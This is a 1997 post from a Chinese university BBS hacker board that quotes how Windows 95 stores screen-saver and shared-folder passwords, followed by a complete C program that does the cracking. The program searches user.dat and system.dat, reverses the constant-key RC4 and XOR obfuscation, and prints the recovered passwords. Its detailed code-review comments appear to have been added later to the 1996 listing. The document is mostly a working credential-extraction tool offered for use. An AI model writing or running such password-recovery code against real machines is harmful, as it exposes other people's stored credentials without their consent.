发信人: Yt_Yan@bbs.ustc.edu.cn (严某人), 信区: cnhacker
标 题: 如何破解win95的screen saver口令
发信站: 中国科大BBS站 (Sat Apr 5 20:43:19 1997)
转信站: Lilac!ustcnews!ustcnews!ustcbbs
【 在 jesse (捷思) 的大作中提到: 】
: Windows 95共享目录口令与屏幕保护口令的加密方法是相同的,口令密文放在注册库
: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network
: \LanMan\目录名\Parm1enc和Parm2enc两位置,但有时注册库里缺少最后一个字符的密文.
: 明文与数列(前八个数是35,9a,4d,a6,53,a9,d4,6a)作异或运算即得密文.
// Filename SCREEN.CPP
// (C) Copyright CAD Center, HUST. All Rights Reserved
// Compile with SMALL model Tel:7545402(H)7543973(O)
/************************************************************
function : Show your SCREENSAVE password
programmer: Jesse
Usage : SCREEN
date : 1996.3.9
************************************************************/
#include <stdio.h>
#include <conio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <bios.h>
//#include <windows.h>
// Shorthand for an 8-bit unsigned value.
#define BYTE unsigned char
// Chunk size used by findid()/findbuf() when walking a file.
#define BUFLEN 0x7f00
// Capacity of the password buffers below (including the terminating NUL).
#define passlen 20
// Shared read buffer: findid() asks findbuf() for up to BUFLEN+30 bytes per chunk.
char buf[ 0x7fff ];
// Search keyword; shows() later overwrites it with 65 bytes read from the file
// and read_USERDAT() parses the text that starts at offset 15.
static char serial[66]="ScreenSave_Data";
char str [passlen]; // "found password"; not referenced by the visible code (shadowed by locals/parameters)
char pass[passlen]; // bytes decoded from hex by read_USERDAT(), then transformed in place by unEncrypt()
BYTE strp[passlen]; // ciphertext ("mi wen"); not referenced by the visible code
// Permutation table built by init(); only indices 0..0xff are written there.
BYTE key[0x102];
// Fixed 4-byte key consumed by init(). Because it is a constant, the stored
// ScreenSave_Data value is only obfuscated: anyone able to read user.dat can
// reverse it, which is the weakness this listing demonstrates.
BYTE v20[4]={0xb2,0xdc,0x90,0x8f};
// Share-password data lives under
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan.
// shown() XORs each stored byte with 0x30 and with the entry at the same index
// here. Only the first eight entries are given; the rest are zero-initialised.
BYTE lanman[32]={5,0xaa,0x7d,0x96,0x63,0x99,0xe4,0x5a};
// Set to 1 by main() when /q or /Q is given; suppresses the banner and the raw dump in shows().
int quiet=0;
void unEncrypt(char * str);
void init();
// Windows directory, filled in by main().
char path[144]="";
// File currently being searched; opened and closed by findid(), read by shows()/shown().
FILE *fp;
// Route the conio-style calls in help() through stdio.
#define cprintf printf
/*
 * Print the program banner and the usage summary.
 * Output goes through cprintf, which this file maps to printf.
 */
void help(void)
{
    static const char *const banner[] = {
        "\nWindows 95 Password Utility (Version 1.00) Apr.1996 Tel:(027)7543973\r\n",
        "Show your computer's ScreenSave and shared directory password\n",
        " May be missing last char or append a char when show some password!\n",
        "(C) Copyright Jesse CAD Center, HUST. All Rights Reserved\r\n\n",
        "Usage : screen -- find Password \n",
        " screen /q -- quiet modle,show password only\n",
        "\r\n"
    };
    unsigned idx;

    /* Emit the lines in order; "%s" keeps the text out of the format slot. */
    for (idx = 0; idx < sizeof banner / sizeof banner[0]; idx++)
        cprintf("%s", banner[idx]);
}
// find keyword in buffer
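/*
 * Read up to `len` bytes at file offset `cur` into the shared buffer `buf`
 * and return the absolute file offset of the first occurrence of `serial`
 * among the bytes that were actually read.
 *
 * Returns 0 when nothing is found, when the seek fails, or when the request
 * is empty. A match at absolute offset 0 is therefore indistinguishable from
 * "not found"; callers in this file treat 0 as "no match".
 *
 * Fixes over the original: the read length is clamped to the size of `buf`,
 * the seek result is checked, and the scan is limited to the bytes fread()
 * delivered, so stale data left in `buf` by an earlier chunk is never matched.
 * As in the original, start offsets at or beyond BUFLEN - strlen(serial) are
 * not examined.
 */
long findbuf( long cur, long len ,FILE *fp,char *serial)
{
    long klen = (long)strlen(serial);
    long got;
    long limit;
    long i;

    if (klen == 0 || cur < 0 || len <= 0)
        return 0L;
    /* Never let a caller-supplied length run past the shared buffer. */
    if (len > (long)sizeof buf)
        len = (long)sizeof buf;
    if (fseek(fp, cur, SEEK_SET) != 0)
        return 0L;

    /* Item size 1 so the return value is the number of bytes read. */
    got = (long)fread(buf, 1, (size_t)len, fp);

    limit = BUFLEN - klen;              /* the original scan bound */
    if (limit > got - klen + 1)
        limit = got - klen + 1;         /* do not compare past the data read */

    for (i = 0; i < limit; i++) {
        if (memcmp(serial, buf + i, (size_t)klen) == 0)
            return cur + i;
    }
    return 0L;
}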
//find keyword in file
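/*
 * Open `name`, walk it in BUFLEN-sized chunks and call `fn(offset)` for the
 * first occurrence of `serial` that findbuf() reports in each chunk.
 *
 * The file handle is stored in the global `fp` for the duration of the call
 * so that the callbacks can read from it. Callbacks may move the file
 * position; that is harmless because findbuf() seeks explicitly.
 *
 * Returns 0 if the file cannot be opened or measured; otherwise the result of
 * the findbuf() call for the final partial chunk (0 if that chunk had no
 * match), exactly as the original did.
 *
 * Fix over the original: fseek()/ftell() failures are detected. Previously a
 * failing ftell() produced a negative length that flowed into the read of the
 * fixed-size shared buffer.
 */
long findid( char *name,char *serial, int (*fn)(long ) )
{
    long size;
    long whole;     /* number of full BUFLEN chunks */
    long rest;      /* bytes in the trailing partial chunk */
    long cur = 0;
    long posi = 0;
    long k;

    fp = fopen(name, "rb");
    if (fp == NULL)
        return 0;

    if (fseek(fp, 0L, SEEK_END) != 0 || (size = ftell(fp)) < 0
        || fseek(fp, 0L, SEEK_SET) != 0) {
        fclose(fp);
        return 0;
    }

    whole = size / BUFLEN;
    rest = size % BUFLEN;

    for (k = 0; k < whole; k++) {
        /* 30 bytes of overlap are requested beyond the chunk boundary. */
        posi = findbuf(cur, BUFLEN + 30, fp, serial);
        if (posi)
            fn(posi);
        cur += BUFLEN;
    }

    posi = findbuf(cur, rest, fp, serial);
    if (posi)
        fn(posi);

    fclose(fp);
    return posi;
}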
//initial data
/*
 * Build the 256-entry permutation in `key`.
 *
 * The table starts as the identity and is then shuffled with the RC4
 * key-scheduling loop, keyed by the four constant bytes in `v20`.
 * Since the key never varies, the resulting table is the same on every run;
 * the transformation built on it hides the stored value but does not protect
 * it from anyone who can read it.
 */
void init()
{
    int idx;
    int swap_at = 0;    /* running swap index, kept in 0..255 */
    int kpos = 0;       /* position in v20, cycles 0..3 */

    for (idx = 0; idx < 0x100; idx++)
        key[idx] = (unsigned char)idx;

    for (idx = 0; idx < 0x100; idx++) {
        int cur = key[idx];

        swap_at = (v20[kpos] + cur + swap_at) & 0xff;

        /* Exchange key[idx] and key[swap_at]. */
        key[idx] = key[swap_at];
        key[swap_at] = (unsigned char)cur;

        kpos = (kpos + 1) & 3;
    }
}
//find screen save password
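/*
 * Reverse the screen-saver password transformation in place and print the
 * result.
 *
 * init() rebuilds the permutation table, then each byte of `str` is XORed
 * with one byte produced by the RC4 output loop over `key`.
 *
 * `str` must be NUL-terminated. Its length is taken with strlen() before
 * decoding, so an input whose encoded form contains a zero byte is cut short
 * at that byte; the interface carries no explicit length to avoid this.
 *
 * Fix over the original: the function now measures and prints its own
 * parameter. The original used the global `pass` for both, which only worked
 * because the single caller passes `pass`; it also kept the length in an
 * 8-bit variable.
 */
void unEncrypt(char * str)
{
    unsigned char i = 0;
    unsigned char j = 0;
    size_t len;
    size_t pos;

    init();
    len = strlen(str);

    for (pos = 0; pos < len; pos++) {
        unsigned char si;
        unsigned char sj;

        /* Indices are 8-bit on purpose: they wrap modulo 256. */
        i = (unsigned char)(i + 1);
        si = key[i];
        j = (unsigned char)(j + si);
        sj = key[j];

        key[i] = sj;
        key[j] = si;

        str[pos] ^= key[(unsigned char)(si + sj)];
    }

    printf("ScreenSave Password=%s\n", str);
}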
// read hex data of password
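/* Value of one hexadecimal digit, or -1 if `c` is not a hex digit. */
static int hex_nibble(int c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    if (c >= 'a' && c <= 'f')
        return c - 'a' + 10;
    if (c >= 'A' && c <= 'F')
        return c - 'A' + 10;
    return -1;
}

/*
 * Convert the hexadecimal text that follows the 15-character keyword in the
 * global `serial` into raw bytes stored in `pass`, and NUL-terminate them.
 * Always returns 0.
 *
 * NOTE(review): this assumes the hex text starts at serial+15, directly after
 * the keyword; confirm against the file layout.
 *
 * Fixes over the original, which parsed data taken from a file without any
 * limits:
 *  - output is capped, so long input can no longer write past the caller's
 *    buffer;
 *  - parsing stops at the first character that is not a complete hex pair,
 *    so an odd-length string no longer steps over the terminating NUL;
 *  - sscanf("%hx") into an int, a format/argument mismatch, is gone, and
 *    `serial` is no longer modified temporarily.
 */
int read_USERDAT(char *pass)
{
    /* Mirrors passlen: the only caller passes the global pass[passlen]. */
    enum { USERDAT_OUT_CAP = 20 };
    const char *p = serial + 15;
    int n = 0;

    while (n < USERDAT_OUT_CAP - 1) {
        int hi = hex_nibble((unsigned char)p[0]);
        int lo;

        if (hi < 0)
            break;              /* NUL or non-hex: end of data */
        lo = hex_nibble((unsigned char)p[1]);
        if (lo < 0)
            break;              /* dangling half pair: ignore it */

        pass[n++] = (char)((hi << 4) | lo);
        p += 2;
    }
    pass[n] = 0;
    return 0;
}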
//find shared directory data
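/*
 * Classify the text at `p` by its leading tag and copy what follows the tag
 * into `str`.
 *
 * Returns 1 for "Path", 2 for "Parm1enc", 3 for "Parm2enc", and 0 when none
 * matches (in which case `str` is left untouched).
 *
 * Fix over the original: the copy is bounded. `p` points into raw file data,
 * so the text after the tag can be arbitrarily long, while the caller's
 * destination is a 44-byte array; the original strcpy() could write past it.
 * At most 43 characters are copied and the result is always NUL-terminated.
 */
int findstr( char *p, char *str)
{
    /* Mirrors the char str[44] destination used by shown(). */
    enum { FINDSTR_OUT_CAP = 44 };
    int kind = 0;
    size_t skip = 0;

    if (strncmp(p, "Path", 4) == 0) {
        kind = 1;
        skip = 4;
    } else if (strncmp(p, "Parm1enc", 8) == 0) {
        kind = 2;
        skip = 8;
    } else if (strncmp(p, "Parm2enc", 8) == 0) {
        kind = 3;
        skip = 8;
    }

    if (kind != 0) {
        const char *src = p + skip;
        size_t n = 0;

        while (n < FINDSTR_OUT_CAP - 1 && src[n] != '\0') {
            str[n] = src[n];
            n++;
        }
        str[n] = '\0';
    }
    return kind;
}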
//show shared directory password
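/*
 * Callback for findid(): print one shared directory and its decoded
 * passwords.
 *
 * Reads BUFLEN bytes starting 0x100 bytes before `posi` from the global `fp`
 * and scans them with findstr(). A "Path" entry is printed with its last
 * character removed; for "Parm1enc"/"Parm2enc" each stored byte is XORed with
 * 0x30 and with the `lanman` entry at the same index. Scanning stops after
 * two Parm entries. Always returns 0.
 *
 * Only the first eight `lanman` entries are non-zero, so characters past the
 * eighth are not meaningfully decoded.
 *
 * Fixes over the original:
 *  - `str[j] ^ 0x30 ^ lanman[j++]` read and modified j in one expression
 *    (undefined behaviour); the index is now advanced separately;
 *  - the decode loop stops at the end of `lanman` instead of reading past it;
 *  - an empty Path value no longer writes to str[-1];
 *  - the seek offset is clamped at 0, and bytes not delivered by fread() are
 *    zeroed so stale buffer contents are not parsed.
 */
int shown(long posi)
{
    int i, j, count = 0;
    char str[44] = {0};
    long start = posi - 0x100;
    size_t got;

    if (start < 0)
        start = 0;
    if (fseek(fp, start, SEEK_SET) != 0)
        return 0;

    got = fread(buf, 1, BUFLEN, fp);
    if (got < BUFLEN)
        memset(buf + got, 0, BUFLEN - got);

    for (i = 0; i < BUFLEN - 8; i++) {
        int kk = findstr(&buf[i], str);

        if (kk == 1) {
            if (count == 0) {
                size_t n = strlen(str);

                if (n > 0)
                    str[n - 1] = 0;     /* drop the trailing character */
                printf("\nPath=%-20s", str);
            }
        } else if (kk > 1) {
            /* Values shorter than two characters are not decoded. */
            if (str[1]) {
                if (kk == 2) printf(" Read_only Password=");
                if (kk == 3) printf(" Full Password=");
                for (j = 0; j < (int)sizeof lanman && str[j]; j++) {
                    char c = str[j] ^ 0x30 ^ lanman[j];

                    if (c > 0)
                        printf("%c", c);
                }
            }
            count++;
            if (count == 2) {
                count = 0;
                break;
            }
        }
    }
    return 0;
}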
//show screen password
/*
 * Callback for findid(): handle one "ScreenSave_Data" hit.
 *
 * Loads 65 bytes at `posi` from the global `fp` into `serial` (a 66-byte
 * array, so its last byte is not written here), echoes them unless quiet
 * mode is on, then has read_USERDAT() turn the hex text into bytes in `pass`
 * and unEncrypt() decode and print them. Always returns 0.
 */
int shows(long posi)
{
    fseek(fp, posi, SEEK_SET);
    fread(serial, 65, 1, fp);

    if (!quiet)
        puts(serial);       /* same output as printf("%s\n", serial) */

    read_USERDAT(pass);
    unEncrypt(pass);
    return 0;
}
//main of password utility
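/*
 * Entry point.
 *
 * Prints the first eight `lanman` entries XORed with 0x30, handles the
 * /q (quiet) switch, locates the Windows directory, then searches user.dat
 * for the screen-saver entry and system.dat for shared-directory entries.
 *
 * Returns 0 on completion and 1 when the Windows directory cannot be
 * determined or its path does not fit the buffers.
 *
 * Fixes over the original:
 *  - getenv("PATH") and strstr() results are checked before use (the
 *    original dereferenced NULL, or stepped before the start of the string,
 *    when ":\WIN" was missing or at the very beginning);
 *  - the directory is copied with an explicit length check instead of an
 *    unbounded strcpy() of the rest of PATH into path[144];
 *  - the file names are only assembled when they fit in name[144];
 *  - main returns int.
 */
int main(int argc, char *argv[])
{
    static const char user_file[] = "\\user.dat";
    static const char system_file[] = "\\system.dat";
    char name[144]="";
    int i;

    for (i = 0; i < 8; i++)
        printf("%3x ", lanman[i]^0x30);

    if (argc > 1 && (strcmp(argv[1],"/q")==0 || strcmp(argv[1],"/Q")==0))
        quiet = 1;
    if (quiet == 0)
    {
        clrscr();
        help();
    }

#ifdef __WINDOWS_H
    if (GetWindowsDirectory((LPSTR)path, sizeof(path)) == 0)
        return 1;
#else
    {
        const char *env = getenv("PATH");
        const char *hit = (env != NULL) ? strstr(env, ":\\WIN") : NULL;
        size_t n;

        /* hit == env would leave no drive letter in front of the colon. */
        if (hit == NULL || hit == env) {
            printf("Windows directory not found in PATH\n");
            return 1;
        }
        hit--;                      /* include the drive letter */
        n = strcspn(hit, ";");      /* this PATH entry only */
        if (n >= sizeof path) {
            printf("Windows directory path is too long\n");
            return 1;
        }
        memcpy(path, hit, n);
        path[n] = 0;
    }
#endif

    /* system_file is the longer suffix; sizeof counts its NUL. */
    if (strlen(path) + sizeof system_file > sizeof name) {
        printf("Windows directory path is too long\n");
        return 1;
    }

    strcpy(name, path);
    strcat(name, user_file);
    findid(name, serial, shows);

    printf("\nSHARED Directory & Password");
    strcpy(name, path);
    strcat(name, system_file);
    findid(name, "Parm1enc", shown);
    printf("\n");
    return 0;
}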
--
※ 来源: 中国科大BBS站 [bbs.ustc.edu.cn]